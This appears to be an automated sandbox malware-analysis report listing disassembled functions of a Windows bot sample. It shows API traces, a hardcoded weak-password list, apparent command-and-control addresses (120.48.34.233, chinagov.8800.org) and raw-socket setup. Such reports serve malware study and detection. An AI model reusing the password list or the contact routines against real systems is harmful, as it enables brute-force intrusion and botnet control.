                                • String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
                                • API String ID: 2657193355-195746125
                                • Opcode ID: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
                                • Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
                                • Opcode Fuzzy Hash: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
                                • Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58
                                Function 004059F4 Relevance: 75.3, APIs: 5, Strings: 38, Instructions: 84libraryregistryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 412 4059f4-405afe LoadLibraryA GetProcAddress _mbscpy _mbscat RegOpenKeyExA 413 405b00-405b08 412->413 414 405b0a 412->414 415 405b0c-405b0f 413->415 414->415
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                • GetProcAddress.KERNEL32(00000000), ref: 00405A10
                                • _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                • _mbscat.MSVCRT ref: 00405AD7
                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadOpenProc_mbscat_mbscpy
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 1994725845-1712674794
                                • Opcode ID: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
                                • Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
                                • Opcode Fuzzy Hash: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
                                • Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6
                                Function 0040336C Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 98librarystringloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
                                • GetProcAddress.KERNEL32(00000000), ref: 00403392
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                • GetProcAddress.KERNEL32(00000000), ref: 004033A0
                                • _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                • strstr.MSVCRT ref: 004033E0
                                • memset.MSVCRT ref: 004033F9
                                • strcspn.MSVCRT ref: 00403410
                                • strncpy.MSVCRT ref: 0040341B
                                • strcspn.MSVCRT ref: 0040342D
                                • atoi.MSVCRT(?), ref: 00403437
                                • socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                • connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProcstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
                                • String ID: 120.48.34.233$EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
                                • API String ID: 2255542143-3763905265
                                • Opcode ID: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
                                • Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
                                • Opcode Fuzzy Hash: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
                                • Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8
                                Function 00406A48 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 429 406a48-406abd __set_app_type __p__fmode __p__commode call 406bc7 432 406acb-406b22 call 406bb2 _initterm __getmainargs _initterm 429->432 433 406abf-406aca __setusermatherr 429->433 436 406b24-406b2c 432->436 437 406b5e-406b61 432->437 433->432 440 406b32-406b35 436->440 441 406b2e-406b30 436->441 438 406b63-406b67 437->438 439 406b3b-406b3f 437->439 438->437 442 406b41-406b43 439->442 443 406b45-406b56 GetStartupInfoA 439->443 440->439 444 406b37-406b38 440->444 441->436 441->440 442->443 442->444 445 406b58-406b5c 443->445 446 406b69-406b6b 443->446 444->439 447 406b6c-406b77 GetModuleHandleA call 40597d 445->447 446->447 449 406b7c-406b99 exit _XcptFilter 447->449
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                • String ID:
                                • API String ID: 801014965-0
                                • Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
                                • Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18
                                Function 00406C10 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26libraryloadernetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 461 406c10-406c38 LoadLibraryA GetProcAddress inet_addr 462 406c3a-406c3f gethostbyname 461->462 463 406c4b-406c4d 461->463 464 406c41-406c43 462->464 465 406c44-406c49 462->465 465->463
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                • inet_addr.WS2_32(?), ref: 00406C30
                                • gethostbyname.WS2_32(?), ref: 00406C3B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProcgethostbynameinet_addr
                                • String ID: WS2_32.dll$gethostbyname
                                • API String ID: 688652319-1612545655
                                • Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
                                • Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68
                                Function 004050CA Relevance: 9.0, APIs: 6, Instructions: 25sleepsynchronizationthreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 004050DB
                                • CreateThread.KERNELBASE(00000000,00000000,0040407C,00000000,00000000,00000000), ref: 004050ED
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
                                • CloseHandle.KERNEL32 ref: 00405107
                                • closesocket.WS2_32 ref: 00405113
                                • Sleep.KERNELBASE(0000012C), ref: 0040511E
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
                                • Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9
                                Function 00405126 Relevance: 9.0, APIs: 6, Instructions: 25sleepsynchronizationthreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 00405137
                                • CreateThread.KERNELBASE(00000000,00000000,004048AA,00000000,00000000,00000000), ref: 00405149
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
                                • CloseHandle.KERNEL32 ref: 00405163
                                • closesocket.WS2_32 ref: 0040516F
                                • Sleep.KERNELBASE(0000012C), ref: 0040517A
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
                                • Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9
                                Function 0040484F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32networkCOMMON
                                Download Yara Rule
                                APIs
                                • htons.WS2_32(00001F9A), ref: 00404861
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                  • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                  • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                • connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                • closesocket.WS2_32(00000000), ref: 0040489A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProcclosesocketconnectgethostbynamehtonsinet_addrsocket
                                • String ID: chinagov.8800.org
                                • API String ID: 1138879652-2288617695
                                • Opcode ID: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
                                • Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
                                • Opcode Fuzzy Hash: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
                                • Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D
                                Function 004051E3 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 004051F9
                                • Sleep.KERNELBASE(00000064), ref: 00405207
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                  • Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 0040521C
                                • Sleep.KERNELBASE(00000064), ref: 0040522D
                                • CreateThread.KERNELBASE(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
                                • String ID:
                                • API String ID: 3108282239-0
                                • Opcode ID: bcd9068842d19d9c9cbd494ec3ef7a5d8030ed6fbbbb000646c41e8093572c94
                                • Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
                                • Opcode Fuzzy Hash: bcd9068842d19d9c9cbd494ec3ef7a5d8030ed6fbbbb000646c41e8093572c94
                                • Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5
                                Function 00405182 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405198
                                • Sleep.KERNELBASE(00000064), ref: 004051A6
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                  • Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 004051BB
                                • Sleep.KERNELBASE(00000064), ref: 004051CC
                                • CreateThread.KERNELBASE(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
                                • String ID:
                                • API String ID: 3108282239-0
                                • Opcode ID: ac8278cae3d0e4772c890e3eb4b9be722006d9c6b36b5f1e017aca795c40357a
                                • Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
                                • Opcode Fuzzy Hash: ac8278cae3d0e4772c890e3eb4b9be722006d9c6b36b5f1e017aca795c40357a
                                • Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9
                                Function 004036C6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403706
                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0040371F
                                • recv.WS2_32(00000000,?,00000008,00000000), ref: 00403738
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 741273618-1553144822
                                • Opcode ID: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
                                • Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
                                • Opcode Fuzzy Hash: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
                                • Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58
                                Function 004037EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040382A
                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00403843
                                • recv.WS2_32(00000000,?,00000008,00000000), ref: 0040385C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 741273618-1553144822
                                • Opcode ID: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
                                • Instruction ID: 0644feca00c3923390fafb838483ae5f7d21c05a749549fcef03ec3df5c1d209
                                • Opcode Fuzzy Hash: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
                                • Instruction Fuzzy Hash: 5E11D6B26002146BDB20AF69CDC9FDB3EECAB04391F004675BA19F61D0D3B4CE8087A4
                                Function 0040507D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                • _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                • wsprintfA.USER32 ref: 004050BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _localtime32timewsprintf
                                • String ID: %04d%02d%02d
                                • API String ID: 1589165986-2607228566
                                • Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                • Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
                                • Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                • Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5
                                Function 004034E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadwsprintf
                                • String ID: hra%u.dll
                                • API String ID: 2341783205-640331709
                                • Opcode ID: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                • Instruction ID: 9e1dc9a3bb07ee0ff9ba8cfb77d47e9a35d0c50c1dd6ee90f04faac7d43bcb07
                                • Opcode Fuzzy Hash: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                • Instruction Fuzzy Hash: 2DD0A7F494020D67CB1097B4EE4EFC533AC5B14704F000170B746F20D0EAF4D1C88A99
                                Function 00404044 Relevance: 4.5, APIs: 3, Instructions: 22networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
                                • connect.WS2_32(00000000,?,00000010), ref: 0040405E
                                • closesocket.WS2_32(00000000), ref: 0040406A
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocketconnectsocket
                                • String ID:
                                • API String ID: 643388700-0
                                • Opcode ID: 704ec3d58031ae9566a14cd635759ccef3e5688480f9d65bb8d4a30476373885
                                • Instruction ID: ece53a1abfa9a1dc296c5e5858b9221d35fcadf656f3c6bdee4a2ab28144fa03
                                • Opcode Fuzzy Hash: 704ec3d58031ae9566a14cd635759ccef3e5688480f9d65bb8d4a30476373885
                                • Instruction Fuzzy Hash: AEE08C30A0052077E22023285D4AFEA3A18AF097B0F900722F735F91E1D7755800429A
                                Function 00403492 Relevance: 3.0, APIs: 2, Instructions: 29networkCOMMON
                                Download Yara Rule
                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ioctlsetsockopt
                                • String ID:
                                • API String ID: 1903391676-0
                                • Opcode ID: ed409dae48886ca97f11c84a6ab00aa046e863856f39508a752c3b793d34e51f
                                • Instruction ID: 0a608003f12cb1d16ace490882b1a903705aebf6f6dc81f323932ad210811262
                                • Opcode Fuzzy Hash: ed409dae48886ca97f11c84a6ab00aa046e863856f39508a752c3b793d34e51f
                                • Instruction Fuzzy Hash: 49F01CB5500209BEFB119F50DD09FAA3B6CEB04708F008125BE05E91D0D7B496488B94
                                Function 00402A92 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
